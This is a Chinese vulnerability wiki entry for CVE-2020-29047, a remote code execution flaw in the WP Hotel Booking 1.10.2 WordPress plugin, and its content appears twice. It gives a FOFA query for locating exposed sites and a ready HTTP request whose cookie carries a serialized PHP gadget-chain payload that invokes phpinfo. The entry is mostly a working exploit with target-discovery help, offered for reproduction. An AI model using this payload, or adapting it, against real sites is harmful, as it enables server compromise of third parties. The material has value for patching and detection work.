fofamini-wiki

登录白背景

源码

WordPress 插件 WP Hotel Booking thimpress_hotel_booking_1 参数远程代码执行漏洞（CVE-2020-29047）

一、漏洞简介

WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台，该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress Plugin WP Hotel Booking 是一款完整的酒店预订插件。WordPress Plugin WP Hotel Booking 1.10.2版本存在代码执行漏洞，攻击者可执行恶意代码控制服务器。

二、影响版本

WordPress Plugin WP Hotel Booking 1.10.2

三、资产测绘

fofa<font style="color:rgb(199, 37, 78);">body="wp-content/plugins/wp-hotel-booking"</font>
特征

四、漏洞复现

GET / HTTP/1.1
Host: 
User-Agent: Mozilla/5.0
Connection: close
Cookie: thimpress_hotel_booking_1=O:11:"WPHB_Logger":1:{s:21:"%00WPHB_Logger%00_handles"%3BC:33:"Requests_Utility_FilteredIterator":67:{x:i:0%3Ba:1:{i:0%3Bs:2:"-1"%3B}%3Bm:a:1:{s:11:"%00*%00callback"%3Bs:7:"phpinfo"%3B}}}
Accept-Encoding: gzip

原文: https://www.yuque.com/xiaokp7/ocvun2/vr7wavwugg2okxgx

# WordPress 插件 WP Hotel Booking thimpress_hotel_booking_1 参数远程代码执行漏洞（CVE-2020-29047）

# 一、漏洞简介
WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台，该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress Plugin WP Hotel Booking 是一款完整的酒店预订插件。WordPress Plugin WP Hotel Booking 1.10.2版本存在代码执行漏洞，攻击者可执行恶意代码控制服务器。

# 二、影响版本
+ WordPress Plugin WP Hotel Booking 1.10.2

# 三、资产测绘
+ fofa`<font style="color:rgb(199, 37, 78);">body="wp-content/plugins/wp-hotel-booking"</font>`
+ 特征

![1711276977635-b8fe060b-0e99-48ae-b5d8-1056b64c4676.png](./img/81bOxeQZOhrEpkJs/1711276977635-b8fe060b-0e99-48ae-b5d8-1056b64c4676-855600.png)

# 四、漏洞复现
```plain
GET / HTTP/1.1
Host: 
User-Agent: Mozilla/5.0
Connection: close
Cookie: thimpress_hotel_booking_1=O:11:"WPHB_Logger":1:{s:21:"%00WPHB_Logger%00_handles"%3BC:33:"Requests_Utility_FilteredIterator":67:{x:i:0%3Ba:1:{i:0%3Bs:2:"-1"%3B}%3Bm:a:1:{s:11:"%00*%00callback"%3Bs:7:"phpinfo"%3B}}}
Accept-Encoding: gzip
```

![1712409021701-dde1cbdb-d06e-4310-b051-a016e84b92d4.png](./img/81bOxeQZOhrEpkJs/1712409021701-dde1cbdb-d06e-4310-b051-a016e84b92d4-446476.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/vr7wavwugg2okxgx>